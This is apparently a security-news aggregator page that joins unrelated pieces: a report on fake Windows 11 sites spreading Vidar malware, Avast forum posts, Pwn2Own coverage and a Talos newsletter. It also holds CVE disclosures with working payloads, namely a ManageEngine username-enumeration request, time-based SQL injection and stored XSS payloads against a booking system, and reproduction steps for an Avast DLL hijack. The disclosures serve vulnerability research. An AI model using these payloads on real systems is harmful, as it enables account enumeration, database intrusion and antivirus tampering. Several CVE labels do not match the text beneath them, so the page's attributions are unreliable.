Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.
"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware

Fraudulent domains masquerading as Microsoft's Windows 11 download portal are attempting to trick users into deploying trojanized installation files to infect systems with the Vidar information stealer malware.

"The spoofed sites were created to distribute malicious ISO files which lead to a Vidar info-stealer infection on the endpoint," Zscaler said in a report. "These variants of Vidar malware fetch the C2 configuration from attacker-controlled social media channels hosted on Telegram and Mastodon network."

Some of the rogue distribution vector domains, which were registered last month on April 20, consist of ms-win11\[.\]com, win11-serv\[.\]com, and win11install\[.\]com, and ms-teams-app\[.\]net.

In addition, the cybersecurity firm cautioned that the threat actor behind the impersonation campaign is also leveraging backdoored versions of Adobe Photoshop and other legitimate software such as Microsoft Teams to deliver Vidar malware.

The ISO file, for its part, contains an executable that's unusually large in size (over 300MB) in an attempt to evade detection by security solutions and is signed with an expired certificate from Avast that was likely stolen following the latter's breach in October 2019.

But embedded within the 330MB binary is a 3.3MB-sized executable that's the Vidar malware, with the rest of the file content padded with 0x10 bytes to artificially inflate the size.

In the next phase of the attack chain, Vidar establishes connections to a remote command-and-control (C2) server to retrieve legitimate DLL files such as sqlite3.dll and vcruntime140.dll to siphon valuable data from compromised systems.

Also notable is the abuse of Mastodon and Telegram by the threat actor to store the C2 IP address in the description field of the attacker-controlled accounts and communities.

The findings add to a list of different methods that have been uncovered in the past month to distribute the Vidar malware, including Microsoft Compiled HTML Help (CHM) files and a loader called Colibri.

"The threat actors distributing Vidar malware have demonstrated their ability to social engineer victims into installing Vidar stealer using themes related to the latest popular software applications," the researchers said.

"As always, users should be cautious when downloading software applications from the Internet and download software only from the official vendor websites."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Hackers Trick Users with Fake Windows 11 Downloads to Distribute Vidar Malware

ManageEngine ADSelfService Plus v6.1 allows attackers to perform username enumeration via a crafted POST request to /ServletAPI/accounts/login.

Permalink

**Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration**

*   Version: 6.1 Build 6121
*   Tested against: ADSelfService 6118 - 6121

The domain username (sAMAccountName) enumeration can be conducted through the app. The domain users which are enrolled to the AdSelfService can be enumerated according to response of the application.

Sending following POST request vulnerability is exploited:

    PoC HTTP Request:
    
    POST /ServletAPI/accounts/login HTTP/1.1
    Host: target
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/javascript, /; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 23
    DNT: 1
    Connection: close
    Sec-GPC: 1
    
    loginName=USERNAME
    

The Administrator, krbtgt, Guest are default accounts in the Active Directory. The krbtgt and guest accounts are disabled defaultly.

*   If the user is not exist , the response is "eSTATUS":"Permission Denied. Kindly contact your Administrator."
*   If the user is exist , the response is ""LOGIN\_STATUS":"PASSWORD","WELCOME\_NAME":"{Username}"
*   If the user is disabled for example Guest or krbtgt user, the response is "eSTATUS":"Your account has been disabled. Please see your system administrator."
*   If the user is expired, the response is "eSTATUS":"Your account has expired. Please see your system administrator."

CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research

An arbitrary file write vulnerability in Avast Premium Security before v21.11.2500 (build 21.11.6809.528) allows attackers to cause a Denial of Service (DoS) via a crafted DLL file.

** Topic: NEW Avast Version 22.1 (January 2022)  (Read 9757 times)**

0 Members and 1 Guest are viewing this topic.

Hi, all. Please welcome the newest version of **Avast AV: 22.1** (22.1.2504)

_Notable improvements in the release:_

*   **Wi-Fi Inspector Password Hints** - Wi-Fi Inspector can now recommend more secure passwords for your home network
*   **Firewall improvements in the UI** - We've re-ordered the Firewall Tabs inside the interface
*   **Boot Time Scan Results** - You'll notice how from now on you get actual results from scans even after reboots

_Some bugfixes we worked on:_

*   Rootkit driver BSOD was fixed
*   User Interface password now works fine, doesn't get removed after update
*   And many more...

The first release of the year! Thank you to our team for the great effort!  
**How to install:**  
1\. Update from your existing Avast version via Settings -> Update -> Update program  
2\. Or you can download and install files:  
_Online installers (recommended):_

*   Free: https://bits.avcdn.net/insttype\_FREE
*   Premium Security: https://bits.avcdn.net/insttype\_APR

_Offline installers:_

*   Free: https://files.avast.com/iavs9x/avast\_free\_antivirus\_setup\_offline.exe
*   Premium Security: https://files.avast.com/iavs9x/avast\_premier\_antivirus\_setup\_offline.exe

(In case the hyperlink here wouldn't work in your browser, just paste and copy the URL to the browser address bar)

« _Last Edit: February 09, 2022, 06:48:17 AM by Karel Šťavík_ »

 Logged

Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.

 Logged

Thanks, spreading the news... 

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

Thanks for the new release 

 Logged

**Main:** Win10 Pro 21H2 64bit / Core i5-7400 3.0GHz / 16GB RAM / Avast 22 Premium _**Beta(Icarus)**_ / Comodo Firewall (testing again)  
**Mobile:** Win10 Pro 21H1 64bit / Core i5-3340M 2.7GHz / 8GB RAM / Avast 21 Free / Windows Firewall Control

**Avast の設定について解説しています。**よろしければご覧ください。

Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?

 Logged

> Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  

Update

 Logged

> > Just checking, version number is "lower" (21.10.2504) than the 21.11 release (21.11.2500) ?  
> 
> Update  

Looks like the "version" should be Avast AV: 22.1 (22.1.6921).

\-dwh

 Logged

> Appreciate mentioning me in the changelog for firewall. I didn't expect that to happen yet my name was there.  I also appreciate devs still care about user input. Still a very rare trait in the software industry, especially from very big companies.  

Avast shows enlightened self-interest and respect by taking note of the obervations of users.  Not to do so shows contempt for users.  To ignore users' views is tantamount to cutting off their own noses to spite their faces.  I wander off the Avast path from time to time.  The experience of that makes me respect Avast all the more.  The little popups are a price well worth paying.

 Logged

Windows 10 Pro x64, Avast Free 22.3.6008, Malwarebytes Anti-Exploit, Malwarebytes Anti-Ransomware

The free version doesn't have a firewall does it?

 Logged

 Logged

> The free version doesn't have a firewall does it?  

On Avast Free Antivirus (not Avast One Essentials), No it isn't, the two products are different.   
Don't I recall you trying Avast One and going back  ?

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

There's **Avast Free** and then there is  
**Avast One Essential**  
Both a free but different products.

 Logged

> The free version doesn't have a firewall does it?  

Hi, it does (since a few months).

 Logged

Win 8.1 \[x64\] - Avast PremSec 22.5.7216.B \[UI.706\] - Firefox ESR 91.9 \[NS/uBO/PB\] - Thunderbird 91.9.0  
Avast-Tools: Secure Browser 101.0 - Cleanup 22.2 - SecureLine 5.18 - Driver Updater 22.2 - CCleaner 6.0  
Avast Wissenswertes (Downloads, Anleitungen & Infos): https://forum.avast.com/index.php?topic=60523.0

> > The free version doesn't have a firewall does it?  
> 
> Hi, it does (since a few months).  

It isn't installed by default, but can be downloaded from the UI (I'm still on version 21.11.xxxx). 

Though I guess from a clean install it would be unless you didn't opt for a custom install.

 Logged

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 22.2.6003 (build 22.2.7013.717) UI 1.0.697/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

It's an option that needs to be selected in a custom install  
as explained here: https://youtu.be/IxozZFC9XRk  
You can also select it later by using the option in  
troubleshooting to modify what you've installed.

 Logged

CVE-2022-28964: NEW Avast Version 22.1 (January 2022)

Multiple DLL hijacking vulnerabilities via the components instup.exe and wsc_proxy.exe in Avast Premium Security before v21.11.2500 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via a crafted DLL file.

**CVE-2022-AVAST2 (Self-Defense Bypass via Repairing Function)****Product**

Avast - Premium Security

**Version**

21.11.2500 (build 21.11.6809.528)

**Vulnerable Component**

"instup.exe" and "wsc\_proxy.exe"

**Description**

It was noted that there is security checking to prevent some of the Avast processes from loading of undesired/unsigned DLLs via DLL hijacking attack.

However, It was noted that there are two Avast processes "instup.exe" and "wsc\_proxy.exe" which are vulnerable to DLL hijacking vulnerability. These processes will attempt to load an non-existing DLL (i.e., wbemcomn.dll) from "C:\\Windows\\System32\\wbem" when "REPAIR APP" function is triggered. Due to the lack of security checking within these two processes, attackers who have administrative privilege could drop a malicious version of "wbemcomn.dll" and get it loaded by the affected Avast processes.

Since those vulnerable components are Avast protected processes, attacker could inject malicious code to control the Avast protected processes for malicious purposes such as deactivating the antivirus and staging malware.

**Impact**

The vulnerability allows an attacker with administrative privilege to execute malicious code within Avast process, terminate the Avast antivirus regardless of "Self-Defense" protection and cause DOS to the affected system.

**Steps to reproduce**

1.  Install Avast Premium Security (version 21.11.2500)
2.  Open a Administrative CMD prompt and copy the malicious version of "wbemcomm.dll" to "C:\\Windows\\System32\\wbem"
3.  Open Avast Premium Security GUI -> Menu -> Settings -> Troubleshooting -> Click on "REPAIR APP"
4.  Wait for a while and the malicious "wbemcomm.dll" will be loaded by "instup.exe" and "wsc\_proxy.exe" (see poc.png)

**Resolution**

This vulnerability is patched since Avast Premium Security 22.2.

**Disclosure Timeline**

20-01-2022 Vulnerability reported to Avast.

11-02-2022 Avast confirmed the vulnerability and released a patch for the product.

**References**

https://forum.avast.com/index.php?topic=318305.0

CVE-2022-28965: Vulnerability-Disclosure/CVE-2022-AVAST2 at main · netero1010/Vulnerability-Disclosure

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=delete_client.

    #### Title: Online Sports Complex Booking System 1.0 SQL Injection#### Author: Zllggggg#### Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html#### Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zip####  Reference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20SQL%20Injection(%E4%BA%8C).md#### Tested on: Windows, MySQL, ApacheAfter entering the background, click the registered clients navigation, select a piece of data and click delete[image: 1648884355.jpg]Find the corresponding source code and find that the ID parameter passed bypost does not have any filtering[image: 1648884613.jpg]The vulnerability is also verified in sqlmap [image: 1648884408.jpg]Data packet```POST /scbs/classes/Users.php?f=delete_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 4Origin: http://localhostConnection: closeReferer: http://localhost/scbs/admin/?page=clientsCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originid=2```Payload```Parameter: id (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1' AND (SELECT 4836 FROM (SELECT(SLEEP(5)))QbFZ) AND'aPSM'='aPSM---```

CVE-2022-28962: Online Sports Complex Booking System 1.0 SQL Injection ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /scbs/classes/Users.php?f=save_client.

    Title: Online Sports Complex Booking System 1.0 XSSAuthor: ZllgggggVendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.htmlSoftware: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs_1.zipReference: https://github.com/playZG/Exploit-/blob/main/Online%20Sports%20Complex%20Booking%20System/Online%20Sports%20Complex%20Booking%20System%201.0%20XSS%20loophole.mdTested on: Windows, MySQL, ApacheDescription:When registering users at the front desk, when we fill in the information,we use burpsuite to catch the data packet,After obtaining the data packet,modify the email parameter to <script>alert(1)</script> then send thepacket,Then log in to the background with the administrator account ,Clickregistered clients to trigger the pop-up windowData packetPOST /scbs/classes/Users.php?f=save_client HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0)Gecko/20100101 Firefox/98.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data;boundary=---------------------------289647566033806702832762971625Content-Length: 1284Origin: http://localhostConnection: closeReferer: http://localhost/scbs/register.phpCookie: PHPSESSID=trkbdt4th4hlsp7bpriuih1816Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="id"1-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="firstname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="middlename"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="lastname"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="gender"Male-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="contact"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="address"ca-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="email"<script>alert(1)</script>-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="password"123-----------------------------289647566033806702832762971625Content-Disposition: form-data; name="img"; filename=""Content-Type: application/octet-stream-----------------------------289647566033806702832762971625--

CVE-2022-29652: Online Sports Complex Booking System 1.0 Cross Site Scripting ≈ Packet Storm

Online Sports Complex Booking System 1.0 is vulnerable to SQL Injection via /classes/master.php?f=delete_ Facility.

**Title: Online Sports Complex Booking System 1.0 SQL Injection****Author: Zllggggg****Vendor: https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html****Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/scbs\_1.zip****Tested on: Windows, MySQL, Apache**

After the program is installed, enter the background, find the facility list in the right navigation bar, select a piece of data, and click the delete button 

According to the submission path /classes/master.php?f=delete\_ Facility, Find delete\_facility(),The ID parameter does not have any filtering,Therefore, SQL injection is caused 

Because the parameters are submitted in post mode,Use burpsuite to intercept and save it as a TXT file,Then use sqlmap to verify sqlmap -r 2.txt 

Data packet

    POST /scbs/classes/Master.php?f=delete_facility HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 4
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/scbs/admin/?page=facilities
    Cookie:PHPSESSID=t261ncguifvbucmfe31v6l74km
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    id=1
    

Payload

    Parameter: id (POST)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: id=1' AND (SELECT 4984 FROM (SELECT(SLEEP(5)))KDjE) AND 'riWF'='riWF

CVE-2022-29304: Exploit-/Online Sports Complex Booking System 1.0 SQL Injection(三).md at main · playZG/Exploit-

By Waqas
Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also…
This is a post from HackRead.com Read the original post: Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

Other than Windows 11, Microsoft Teams and Mozilla Firefox, Oracle Virtualbox, Ubuntu Desktop, and Safari browser were also hacked on day one of PWN2OWN 2022 in Vancouver.

Pwn2Own is a hacking contest where white hate hackers come forward and compete against each other and earn thousands of dollars for detecting unknown vulnerabilities in popular software/OS. On the first day of the 15th edition of Pwn2Own, vulnerability researchers earned around $800,000.

According to the event organizer, Trend Micro’s Zero Day Initiative (ZDI), this was the highest single-day award amount ever won in this contest. All the ten hacking attempts were successful. The competition will conclude on Friday.

It is worth noting that this is the second edition of Pwn2Own in 2022. The first edition was held in Miami and focused mainly on ICS (industrial control systems). Participants earned $400,000 for successful exploits.

**Microsoft Teams Exploits “Stole” the Show**

Around $450,000 out of the total awarded sum of $800,000 was won by hackers who detected vulnerabilities in Microsoft Teams. Hackers exploited sixteen zero-day vulnerabilities against Windows 11, MS Teams, Firefox, Ubuntu, Oracle VirtualBox, and Safari. Hackers will again target Teams on the last day of Pwn2Own, on Friday.

For MS Teams, $150,000 were awarded for each of the 3 exploit chains leveraged by Masato Kinugawa, Hector Peralta (p3rr0), and the STAR Labs team comprising Billy Jheng Bing-Jhong, Muhammad Alifa Ramdhan, and Nguyễn Hoàng Thạch.

According to ZDI’s blog post, Peralta demonstrated an improper configuration. Kinugawa exploited a 3-bug chain, including a sandbox escape, a configuration, and an injection, while the STAR Labs team leveraged an arbitrary file write flaw and injection using a zero-click remote code execution exploit on Oracle VirtualBox.

**More Pwn and Bug Bounty News**

1.  Bug bounty: Hack Tesla Model 3 to win your own Model 3
2.  Hack the US Army for good with ‘Hack The Army’ bug bounty program
3.  Microsoft Exchange server, Teams, Zoom, Chrome pwned at Pwn2Own
4.  Xiaomi, Amazon Echo, Sony & Samsung Smart TVs pwned at Pwn2Own
5.  iPhone 13 Pro, Windows, Chrome, Linux and others pwned at Tianfu Cup

**Other Successful Exploits**

Manfred Paul won $100,000 for identifying a sandbox escape exploit in Mozilla Firefox, which involved improper input validation and prototype pollution, and an additional $50,000 for an out-of-band write on Apple Safari.

Other hackers won $40,000 each for the rest of the exploits. This includes Marcin Wiązowski, who executed an out-of-bounds write privilege escalation on MS Windows 11. Team Orca of Sea Security executed two bugs on the Ubuntu desktop, STAR Labs’ Phan Thanh Duy and Lê Hữu Quang Linh exploited MS Windows 11 with a Use-After-Free elevation of privilege. Keith Yeo performed a Use-After-Free exploit on Ubuntu Desktop.

On Thursday, Pwn2Own’s second day, researchers will hack a Tesla Model 3, and successful attempts will grant them up to a $600,000 bounty plus a new Tesla.

**_Did you enjoy reading this article? Do like our page on Facebook and follow us on Twitter._**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Pwn2Own 2022 – Windows 11, MS Teams and Firefox Pwned on Day 1

By Jon Munshaw. 
Welcome to this week’s edition of the Threat Source newsletter. 
I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

_By Jon Munshaw._ 

Welcome to this week’s edition of the Threat Source newsletter. 

I will openly admit that I still own a “classic” iPod — the giant brick that weighed down my skinny jeans in high school and did nothing except play music. There are dozens of hours of music on there that I always tell myself I’m going to back up somewhere and never do. The iPod doesn’t have any charge at the moment, and I still need to hop on eBay to buy one of those flat chargers for it to even start the backup process. So no, I’m sure I’ll never get around to backing it up and recycling the device. 

But that doesn’t make it any less painful to hear that Apple is going to stop making iPods altogether. I’m a longtime iPod user and have owned everything from the original “stick of gum” iPod shuffle, to the tiny, square iPod nano that clipped to my backpack and made me think I was really cool, along with pretty much every other iteration of the nano. 

The news of the iPod’s end got me thinking about how far the threat landscape has come. We all have a supped-up iPod in our pockets now that connects to the internet at a moment’s notice and is one risky click away from someone stealing your banking app password. It used to be that when I wanted new music, I would have to plug the iPod into my parents’ Mac at home and connect to the internet, and then pray that whatever perilous download I was grabbing from uTorrent or LimeWire wasn’t going to download a virus. Most of the time, I thankfully landed on a somewhat legitimate version of a Slayer album. 

Nowadays, attackers have even come up with ways to install malware on your iPhone even when it’s powered down — that was never an issue in the heyday of the iPod! 

Though in my walk down memory lane, I did learn that some classic iPods shipped in 2006 contained Windows malware known as “RavMonE.exe,” an early example of why everyone should have at least a base anti-virus enabled.  

I’ll miss the days of the iPod, when I didn’t have to worry about malware following me in my backpack or briefcase. But I don’t miss having to illegitimately listen to Slayer, I’ll gladly pay the $10 a month for Spotify to avoid having to hope a file from “xX\_metalhead420Xx\_” doesn’t have malware in it.  

**The one big thing **

A critical vulnerability in F5’s BIG-IP software continues to dominate security headlines and haunt defenders. Though we released coverage for this vulnerability last week, attackers are still exploiting it in the wild. Security researchers at the SANS Institute recently discovered adversaries exploiting the vulnerability to try and completely wipe some Linux systems. The U.S. Cybersecurity and Infrastructure Security Agency also added CVE-2022-1388 to its list of known vulnerabilities and gave federal agencies until May 30 to patch for the issue.   

> **Why do I care? **
> 
> The continuous warnings around this vulnerability show how truly widespread and potentially dangerous it is. Due to the nature of this vulnerability, and adversary could exploit it and obtain root privileges in the Linux operating systems powering BIG-IP devices. While most attackers seem to be using it to gain an initial foothold on a system, this also opens the door to an attacker running specific commands to delete files on the system, including ones that are required for the operating system to function correctly.  
> 
> **So now what? **Cisco Secure products have several ways of detecting exploitation of this vulnerability and defending against it. F5 also has a patch available for the vulnerability, which should be implemented immediately. If users are not able to patch for some reason, Talos, CISA and F5 all recommend blocking iControl REST access through the self IP address and management interface. 

**Other news of note**

The quantum computing race is on. This week, U.S. officials said they believe America will be the first country to harness the power of quantum computing, outpacing rivals like China. It’s widely believed that quantum computers will break current encryption technologies. This means the U.S. also has to develop new encryption standards, which has interested privacy experts. Though the National Security Agency has had backdoors into encryption methods in the past, the agency says that will not be the case for whatever standard the U.S. develops to combat quantum computing. (CyberScoop, Bloomberg) 

U.S. officials released a warning this week that North Koreans are posing as remote workers and hiding their true identities to apply for jobs with cryptocurrency-related companies. These individuals eventually aim to get onto corporate networks and steal currency for the North Korean government. While many of the adversaries are based in North Korea, others are operating out of China, Russia, Africa and South East Asia. North Korean state-sponsored actors have been finding different ways to steal virtual currency for years, mainly in the name of funding the country’s weapons program. (BBC, U.S. Department of Treasury) 

Western governments and security experts continue to sound warnings about potential cyber attacks from Russian state-sponsored groups. Although there have not been any major public attacks as expected when Russia invaded Ukraine, there has been a sustained effort to improve Russia’s standing in the war. Finland and Sweden’s application to join the NATO military alliance also raised the possibility that Russia could respond with a cyber attack. Albeit more low-stakes, Russian actors also tried to disrupt the semifinals and finals of the Eurovision Song Contest in Italy last week, a contest that Ukraine eventually won. (Reuters, The Hill, BBC) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #96: Takeaways from victim chats with two ransomware groups
*   Vulnerability Spotlight: Multiple memory corruption vulnerabilities in NVIDIA GPU driver
*   Ransomware: How executives should prepare given the current threat landscape
*   Threat Roundup for May 6 - 13

  

**Upcoming events where you can find Talos ****NorthSec 2022 (May 19 – 20, 2022)  
Montreal, Canada ****REcon (June 3 – 5, 2022)  
Montreal, Canada ****RSA 2022 (June 6 – 9, 2022)  
San Francisco, California ****Cisco Live U.S. (June 12 – 16, 2022)  
Las Vegas, Nevada ****Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  **MD5:** 93fefc3e88ffb78abb36365fa5cf857c  **Typical Filename:** Wextract    
**Claimed Product:** Internet Explorer    
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

**SHA 256:** 1b94aaa71618d4ecba665130ae54ef38b17794157123675b24641dc85a379426    
**MD5:** a841c3d335907ba5ec4c2e070be1df53  **Typical Filename:** chip 1-click installer.exe    
**Claimed Product:** chip 1-click installer     
**Detection Name:** Win.Trojan.Generic::ptp.cam  

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91   **MD5:** 7bdbd180c081fa63ca94f9c22c457376  **Typical Filename:** c0dwjdi6a.dll    
**Claimed Product:** N/A   **Detection Name:** Trojan.GenericKD.33515991  

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa   **MD5:** df11b3105df8d7c70e7b501e210e3cc3   **Typical Filename:** DOC001.exe   **Claimed Product:** N/A     
**Detection Name:** Win.Worm.Coinminer::1201  

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  **MD5:** a087b2e6ec57b08c0d0750c60f96a74c  **Typical Filename:** AAct.exe    
**Claimed Product:** N/A    **Detection Name:** PUA.Win.Tool.Kmsauto::1201

Threat Source newsletter (May 19, 2022) — Why I'm missing the days of iPods and LimeWire

Windows Print Spooler Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-29104, CVE-2022-29132.

Tag

#windows